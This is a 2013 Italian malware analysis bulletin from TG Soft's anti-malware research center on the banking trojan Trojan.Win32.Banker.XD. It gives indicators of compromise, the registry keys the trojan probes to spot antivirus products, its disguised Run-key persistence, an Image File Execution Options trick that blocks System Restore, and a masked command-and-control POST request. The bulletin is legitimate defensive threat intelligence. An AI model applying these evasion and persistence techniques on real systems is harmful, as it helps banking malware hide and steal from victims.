27/09/2013
12:46

Trojan.Win32.Banker.XD utilizza tecniche stealth per eludere la sua presenza.

Il C.R.A.M. Centro Ricerca Anti-Malware di TG Soft ha rilevato che da alcune settimane si sta diffondendo una nuova variante di banker che utilizza tecniche stealth per nascondersi.

Da alcune settimane si sta diffondendo una nuova variante di banker che utilizza tecniche stealth per nascondersi.
Questa nuova variante di banker, classificato come Trojan.Win32.Banker.XD, nasconde la sua presenza a livello di registro in modo da eseguirsi automaticamente all'avvio di Windows e disabilita il ripristino di configurazione di sistema.

Il sample analizzato dal C.R.A.M. (Centro Ricerca Anti-Malware) è stato identificato con il nome di Trojan.Win32.banker.XD,


Proprietà del file:
MD5: DFFAFE13BE9FEA16EB79E4EF1A3E0E13
Dimensione: 96608 byte
Nome: [nome casuale].exe
Lingua: Cinese (Hong Kong - R.A.S.)
Nome file originale: Bloemfon.exe
Prodotto: Forepoint seroderm
Società: CamStudio Open Source Dev Team

Quando viene eseguito il file infetto da Trojan.Win32.Banker.XD, questo crea una cartella nascosta con attributi di sistema:
C:\Programmi\Common Files\h65guhb0

All'interno della cartella vengono creati due files:

  • dttezfca.exe (una copia di se stesso con attributi: nascosto e di sola lettura) 

  • 00177fae.txt ( viene eliminato subito dopo la sua creazione, nessun dato viene scritto al suo interno)

Operazioni eseguite su registro di sistema:

Crea la chiave
HKCU\Software\WinZip\Uuid
 

Legge il valore della chiave

HKLM\SOFTWARE\Microsoft NT\CurrentVersion\ProductId

Controlla la presenza di eventuali software AntiVirus sul computer, interpellando in sequenza le seguenti chiavi di registro:

  • HKLM\SOFTWARE\Symantec

  • HKLM\SOFTWARE\Avira

  • HKLM\SOFTWARE\ESET

  • HKLM\SOFTWARE\ArcaBit

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVG_UI

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVP

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bdagent

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trendo Micro Titanium

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\avast

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSC

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BullGuard

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sophos AutoUpdate Monitor

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SplDerAgent

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\APVXDWIN

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\emisisoft anti-malware

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ISTray

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\G Data AntiVirus Tray Application

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\G Data AntiVirus Tray

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ZoneAlarm

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bkav

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\V3 Application

Legge il valore di:

  • HKCU\Software \Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup


Il Trojan.Win32.Banker.XD, per eseguirsi automaticamente all'avvio, aggiunge le seguenti chiavi di registro:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    [j8hjfuin] =     \Windows\Explorer.exe

  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    [j8hjfuin] =     \Windows\Explorer.exe


In realtà la stringa j8hjfuin che punta a \Windows\Explorer.exe non avvia il consueto Explorer.exe di Windows ma esegue, invece, Il Trojan,Win32.Banker.XD da questa posizione C:\Programmi\Common Files\h65guhb0\dttezftca.exe

Quando viene richiesta la lettura (a livello user mode) della chiave registro del Trojan.Win32.Banker.XD, questo restituirà il percorso del file "\Windows\Explorer.exe" invece del file infetto del Trojan.Win32.Banker.XD.


Inoltre va a disabilitare il Ripristino di sistema di Windows, bloccando l'esecuzione del file di Windows rstrui.exe.
Per far ciò, il Trojan.Win32.Banker.XD, aggiunge la seguente chiave di registro:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\IamgeFileExecutionOptions\rstrui.exe
[Debugger] = <nome casuale>_.exe

Con questo tipo di modifica, qualsiasi programma avviato, con nome rstrui.exe , verrà eseguito dal debugger indicato nella chiave di registro.
Se il file di debugger specificato non è presente, comporterà l'errore dell'esecuzione del programma richiesto.

In questo caso il Trojan.Win32.Banker.XD, specifica come debugger un file .EXE con nome casuale, che cambia ad ogni avvio del computer, ecco alcuni esempi:

  • txklyboa_.exe

  • lgzo_.exe

  • t_.exe

  • [nome casuale]_.exe

Il file indicato come debugger non è presente nel computer.

Con questo approccio l'utente non potrà mai utilizzare l'utility di ripristino di Windows.

Con quest'ultima modifica il banker si assicura una costante presenza sul PC compromesso impedendo il ripristino del sistema operativo in un punto precedente all'infezione.

Il Trojan.Win32.Banker.XD si collega al sito http://www.romeoxx.xx (217.23.xxx.xxx) sulla porta 80, inviando la seguente richiesta:

POST /batman/ice/order.php HTTP/1.1 caricando cinque distinti valori:
 

ps0=

0000000000000000000000000000000000000
0000000000000000000000000000000000000

ps1=

855BB5FD28AB63A326466800ED74AC5FF9325F43F
1603E957DDE6640906CE811A735A243F4298FB91C
318F08FE4BB334C9812265B2340B2523B8C4D8025
D83892682B9FB18DB30D13FE27056E28168B9C275
316FCDEC85C7AF67B7F3A11AA6A5E0C82B0789F86
4E54B89795E49766EC12507B950DB45F59BEE71E7
72DE464BB1899CEC44DA1614CD5D0BBC0098D32
15AB2E449F2

cs1=

5ECC83EA41CCE9EA6FCCD6EA7ACCCBEA7CCCD4E
A70CCD0EA41CCFAEA72CCD4EA70CCD6EA73CC99
EA5BCCD0EA71CCDCEA6ECCE5EA75CC8FEA28CCD
EEA68CCD1EA7FCC89EA41CCCFEA7BCCCEEA75CC
D1EA64CCDDEA71CCCBEA33CCDCEA65CCDCEA

cs2=

74CCDCEA65CCC9EA71CCD6EA6FCCDCEA33CCD
CEA65CCDCEA

cs3=

5ECCEBEA5CCCF4EA45CCE9EA2ACC8CEA2BCC8F
EA28CC8AEA41CCFAEA4FCCF8EA50CC

Geolocazione del sito http://www.romeoxx.xx (217.23.xxx.xxx)

 

Il  Trojan.Win32.Banker.XD viene intercettato e rimosso da  Vir.IT eXplorer versione 7.5.1.


---------------------------------
CRAM (Centro Ricerche Anti-Malware) di TG Soft

Ogni informazioni pubblicata sul nostro sito può essere utilizzata e pubblicata su altri siti internet, blog, forum, facebook e/o in ogni altra forma sia in modalità cartacea che elettronica a patto che venga sempre e comunque citata la fonte esplicitamente “Fonte: C.R.A.M. by TG Soft www.tgsoft.it” con link cliccabile all'informativa e/o pagina web originale da cui sono stati estrapolati contenuti testuali, spunti e/o immagini.

Sarà gradito nel caso di utilizzo dell'informativa del C.R.A.M. by TG Soft www.tgsoft.it nella relazione di articoli di sintesi il riconoscimento/ringraziamento di seguito “Si ringrazia il Centro Ricerche Anti-Malware C.R.A.M. by TG Soft di cui segnaliamo il link diretto all'informativa originale:[link diretto cliccabile]”

Vir.IT eXplorer PRO è certificato dai maggiori enti internazionali: